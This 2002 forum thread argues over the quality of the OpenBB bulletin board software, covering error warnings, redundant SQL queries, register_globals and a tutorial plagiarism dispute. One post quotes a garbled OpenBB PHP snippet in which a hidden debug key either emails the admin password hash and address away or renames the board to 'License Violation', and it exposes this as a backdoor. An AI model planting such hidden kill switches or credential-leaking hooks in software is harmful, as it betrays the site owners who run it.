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Old 07-14-2002, 06:35 AM
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Originally posted by Sara's-faction
As a matter of fact,
(we) are. Trivaya and I are better known as Ace and Sara on OpenBB. Plans have already started on a follow up flag ship that will have faster loading times than the current Obb, and still retain all of the functionality of most modern bulletin boards to date. Load times on this new project are sub .01 with a simulated 1000 member sessions.

You would be shocked to know what proper coding can achieve, pal.

Well with a speech like that I just had to try your ultimate software, right?

Warning: Undefined property: queries in /obb/lib/database/mysql.php on line 67
Warning: Undefined variable: HTTP_X_FORWARDED_FOR in /obb/base.php on line 164
Warning: Use of undefined constant lgthsubj - assumed 'lgthsubj' in /obb/base.php on line 341
Warning: Use of undefined constant lgthdesc - assumed 'lgthdesc' in /obb/base.php on line 342
Warning: Cannot add header information - headers already sent by (output started at /obb/lib/database/mysql.php:67) in /obb/base.php on line 395
Warning: Undefined offset: 99 in /obb/base.php on line 419
Warning: Undefined variable: quit_reason in /obb/base.php on line 429
Warning: Undefined variable: quit_reason in /obb/base.php on line 435
Warning: Undefined offset: 1 in /obb/lib/functions.php on line 170
Warning: Undefined variable: query_forums in /obb/lib/functions.php on line 234
Warning: Undefined variable: adminquery in /obb/cp.php on line 228
Warning: Undefined variable: settings in /obb/cp.php(247) : eval()'d code on line 44
Warning: Undefined variable: forummanager in /obb/cp.php(247) : eval()'d code on line 45
Warning: Undefined variable: users in /obb/cp.php(247) : eval()'d code on line 46
Warning: Undefined variable: usergroup in /obb/cp.php(247) : eval()'d code on line 47
Warning: Undefined variable: email in /obb/cp.php(247) : eval()'d code on line 47
Warning: Undefined variable: avatars in /obb/cp.php(247) : eval()'d code on line 48
Warning: Undefined variable: images in /obb/cp.php(247) : eval()'d code on line 49
Warning: Undefined variable: design in /obb/cp.php(247) : eval()'d code on line 50
Warning: Undefined variable: ipbanning in /obb/cp.php(247) : eval()'d code on line 51
Cute errors, love that. Someone forgot to set error_reporting()...?

Apparently you require register_globals to be turned On, which is a pointless requirement since you can emulate register_globals On (being an extraordinary programmer I'm sure you've heard of extract()). However, users that have it turned Off will never be able to see that requirement since they can't get to step 2, pal.

An error occured while trying to connect to the DB. (Unknown database 'obb')
How come this wonderful script didn't create the database itself, even though I gave it the root user information? Very user friendly indeed.

Ohh, what's this?
PHP Code:
    if (md5($debugkey) == 'be7ca03a93a372dc0c0ee9d3a3b90def') {
$sysgo == 'violate') {
$query_admin = new query($SQL"SELECT password, email FROM ".$prefix."profiles WHERE id = '1'");
$lisc md5($query_admin->field('password'));
$sendermail $query_admin->field('email');
$message $config->field('boardurl').'lisckey'.$lisc;
$mailheaders "From: $sendermail";
$syssubject "Lisc Validation";            
$sysgo == 'close') {
$query_admin = new query($SQL"SELECT password FROM ".$prefix."profiles WHERE id = '1'");
$lisc md5($query_admin->field('password'));
$key $lisc) {
query($SQL"UPDATE ".$prefix."configuration SET boardname = 'License Violation'");
Nice, built-in methods to nuke my site! Or to email you my admin details!

Correct me if I'm wrong, but didn't you say 24 queries on showthread was quite a lot?
SELECT lots of fields FROM obb_configuration
SELECT member, record FROM obb_active WHERE record = '47373d3133f1c660f'
UPDATE obb_active SET lots of stuff
SELECT lots of fields FROM obb_profiles WHERE username = 'Chen'
SELECT send, subject FROM obb_pmsg WHERE owner = 'Chen' AND box = 'inbox' AND isread = '0' ORDER BY time
SELECT forumid FROM obb_moderators WHERE modid = '1'
SELECT org, rep FROM obb_vars WHERE groupid = 0
SELECT lgthsubj, lgthdesc FROM obb_configuration
SELECT template, id FROM obb_templates WHERE groupid = 0 AND (id IN (lots of numbers))
UPDATE obb_profiles SET ip = '', lastactive = '1026635458' WHERE username = 'Chen'
SELECT isadmin FROM obb_usergroup WHERE id = 3
SELECT forumid, pollid, description, locked FROM obb_topics WHERE id = 1
UPDATE obb_active SET inforum = '2' WHERE member = 'Chen'
SELECT smiley, image FROM obb_smilies
UPDATE obb_favorites SET visit = '1' WHERE threadid = 1 AND username = 'Chen'
SELECT ismoderator FROM obb_forum_permissions WHERE forumid = '2' and uid = '3'
SELECT ismoderator FROM obb_usergroup WHERE id = '3'
UPDATE obb_favorites set visit = '1' WHERE threadid = '1' AND username = 'Chen'
SELECT title, replies FROM obb_topics WHERE id = '1'
UPDATE obb_topics SET views = (views + 1) WHERE id = 1
UPDATE obb_configuration SET totalviews = (totalviews + 1)
UPDATE obb_active SET location = 'Reading Topic testing...' WHERE record = '47373d3133f1c660f'
SELECT output FROM obb_navigations WHERE id = 'forum:2'
SELECT lots of fields FROM obb_posts, obb_profiles WHERE obb_posts.poster = obb_profiles.username AND obb_posts.threadid = '1' ORDER BY obb_posts.id LIMIT 0,10
SELECT member FROM obb_active WHERE member = 'Chen' AND '1026635468' - lastaction < 600 
SELECT isadmin, ismoderator FROM obb_usergroup WHERE id = '3'
SELECT title, icon FROM obb_usergroup WHERE id = '3'
SELECT custom AS usertitle FROM obb_profiles WHERE username = 'Chen' LIMIT 1
SELECT image FROM obb_usergroup WHERE id = '3' LIMIT 1
SELECT cache FROM obb_cache WHERE name = 'forums:gid3' LIMIT 1
SELECT total, options, answers FROM obb_polls WHERE id = '1'
SELECT org, rep FROM obb_vars WHERE groupid = '0'
SELECT email FROM obb_profiles WHERE id = '1'
Of course I'm not as gifted as you must be, but counting the lines I see 33 queries. And that is with only one post! Geez, I wonder how much longer till this whole board caves in!

Not to mention I see some double queries in there, specifically:
SELECT org, rep FROM obb_vars WHERE groupid = 0
SELECT org, rep FROM obb_vars WHERE groupid = '0'
/* or */
UPDATE obb_favorites SET visit = '1' WHERE threadid = 1 AND username = 'Chen'
UPDATE obb_favorites set visit = '1' WHERE threadid = '1' AND username = 'Chen'
Thank you for this great enlightenment, I am truly shocked to see what proper coding can achieve.
Old 07-14-2002, 06:59 AM
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Now, Chen, have we learned something from this? With the help of these fine people, you are on your way to being the crack programmer they are. Aren't you blessed?!
Old 07-14-2002, 07:13 AM
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My God I have to switch to OBB right away, I know its dynamic code are going to prove to be much better than VB3.
Old 07-14-2002, 07:18 AM
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And don't forget those excellent coders that have taught us all so much with their superb software. Isn't life grand?
Old 07-14-2002, 07:30 AM
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Oh look, they also ripped two of nakkid's tutorials.
What a great group indeed.
Old 07-14-2002, 07:36 AM
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Gee, after all this, I decided to look up this OBB and see what it was like.


Funny thing! When I got there, the newest member was "vBulletin", who is already correcting some of the misstatements made by Ace!
Old 07-14-2002, 02:21 PM
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FireFly, I just read your post, and my.. that was hilarious
Old 07-15-2002, 04:12 AM
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I signed up a few hours ago, and the email came about an hour later.
Old 07-15-2002, 09:15 AM
trivaya trivaya is offline
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Originally posted by FireFly
Well with a speech like that I just had to try your ultimate software, right?
Well, first off... OpenBB should not have been mentioned in this thread.. This was honest criticism and agreement with Freddie's point that many hackers do not take pride in their hacks, from two developers.
Warning: Undefined property: queries in /obb/lib/database/mysql.php on line 67
Warning: Undefined variable: HTTP_X_FORWARDED_FOR in /obb/base.php on line 164
Warning: Use of undefined constant lgthsubj - assumed 'lgthsubj' in /obb/base.php on line 341
Warning: Use of undefined constant lgthdesc - assumed 'lgthdesc' in /obb/base.php on line 342
Warning: Cannot add header information - headers already sent by (output started at /obb/lib/database/mysql.php:67) in /obb/base.php on line 395
Warning: Undefined offset: 99 in /obb/base.php on line 419
Warning: Undefined variable: quit_reason in /obb/base.php on line 429
Warning: Undefined variable: quit_reason in /obb/base.php on line 435
Warning: Undefined offset: 1 in /obb/lib/functions.php on line 170
Warning: Undefined variable: query_forums in /obb/lib/functions.php on line 234
Warning: Undefined variable: adminquery in /obb/cp.php on line 228
Warning: Undefined variable: settings in /obb/cp.php(247) : eval()'d code on line 44
Warning: Undefined variable: forummanager in /obb/cp.php(247) : eval()'d code on line 45
Warning: Undefined variable: users in /obb/cp.php(247) : eval()'d code on line 46
Warning: Undefined variable: usergroup in /obb/cp.php(247) : eval()'d code on line 47
Warning: Undefined variable: email in /obb/cp.php(247) : eval()'d code on line 47
Warning: Undefined variable: avatars in /obb/cp.php(247) : eval()'d code on line 48
Warning: Undefined variable: images in /obb/cp.php(247) : eval()'d code on line 49
Warning: Undefined variable: design in /obb/cp.php(247) : eval()'d code on line 50
Warning: Undefined variable: ipbanning in /obb/cp.php(247) : eval()'d code on line 51
Cute errors, love that. Someone forgot to set error_reporting()...?
You will get similar erros running vB in E_ALL
Apparently you require register_globals to be turned On, which is a pointless requirement since you can emulate register_globals On (being an extraordinary programmer I'm sure you've heard of extract()). However, users that have it turned Off will never be able to see that requirement since they can't get to step 2, pal.
Emulate being the key word there. I can think of 5 different ways that range from extract to the infamous foreach() tricks.. All any of them do is circumvent the security of register_globals... Using your logic, why even bother having register_globals? Shouldn't even be an option, the hell with security, just leave it on. Don't get me wrong, Chen... as I said on our own forums in reply to your post, OpenBB has the same issue as vB does (and then some) - however, I believe in user awareness, and I'm not going to mislead people into thinking they have security they don't. So, if they don't have register_globals, they don't use it.. period. I'm obviously not on a quest to financial success.. and I'd rather send a few people away until the new version is released, which is done the proper way, than "emulate" a false sense of security.
How come this wonderful script didn't create the database itself, even though I gave it the root user information? Very user friendly indeed.
lol you're *really* reaching now. very few users have mysql root access, and 80+% do everything via a control panel... furthermore, last I knew, vB didn't even generate the sql details file for you, you had to edit it yourself, before proceeding with the installation.

I will be the first to admit OpenBB needs a lot of work... Through a year of various coders in the mix, a complete release of the development team.. it's not exactly where it should be... which is why a new product is being developed from scratch, using the latest technologies. I personally never claimed OpenBB was superior to vBulletin as a whole... but there are definite faults, just as you pointed out in OpenBB (though, I would like to point out, openbb doesn't cost $160(?) either) There are somewhere around 6(?) queries on the index alone to generate statistics (on-the-fly, might I add)... Storing statistics in a seperate table is far more efficient than generating them on the fly, and could cut the index of vB down by half. Don't get me wrong, vB was very innovative, and back in the day (yes I was, and technically still am a vB license holder.. before my obb days), from a coding standpoint, it was the hottest thing since sliced bread. Those days have long passed (as they have for obb as well)... the coding is outdated, slow, lacks efficiency, and doesn't make use of the latest technology. That's what vB3 is for... and I hope it's everything it claims to be, because we ALL have a lot of catching up to do imo.

Anyways, this has turned into a vB vs. OpenBB debate, and the issue at hand here was the hacking community. Given the number of users you have here, I think you're doing a good job... but I still take issue, if not as a vB licenseholder, then as an advocate of the idea of "community support".. I take issue with people like afterlab who come around to showboat their "creations", generate traffic to their own sites, and play "dangle the candy in front of the kids." It's unnecessary, and if memory serves, there's a section of this forum dedicated to just that thing... it's a shame that showoffs feel the need to get an ego boost at other's expense. The question of skill was brought in when commercialization of hacks was discussed. As I said, I too was a vB user, and I've seen the hacks produced.. and I will maintain that 80% are not worthy of being sold. That's not only because of skill, but if you look at some of these hacks, you know people can do better... as freddie said, it's an issue of pride. People already paid more than they should for vB itself, the whole point of a hacks "community" is to provide others with resources. 'Hackers' shouldn't be creating hacks with the intent to profit, at least not publicly. No, people shouldn't "waste their time" for free, but if one thinks of it like that, they really shouldn't be here anyways.

At any rate, that's my .02, and I apologize this turned into something it shouldn't have.


Edit: As for the "ripping" - there is no stolen code, and I believe you're referring to the tutorial? If that's the case, I was not aware it was from vB, and it has been removed. I suggest such issues be taken up with Anthony.
Old 07-15-2002, 09:18 AM
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trivaya, you forget about my tutorials rip????????
who gives you the right to label them as yours????
do you have any idea how much time i spend to test everything and put it toghether?
no, you dont. you didnt even bothered to change the graphs and the sentences a little...
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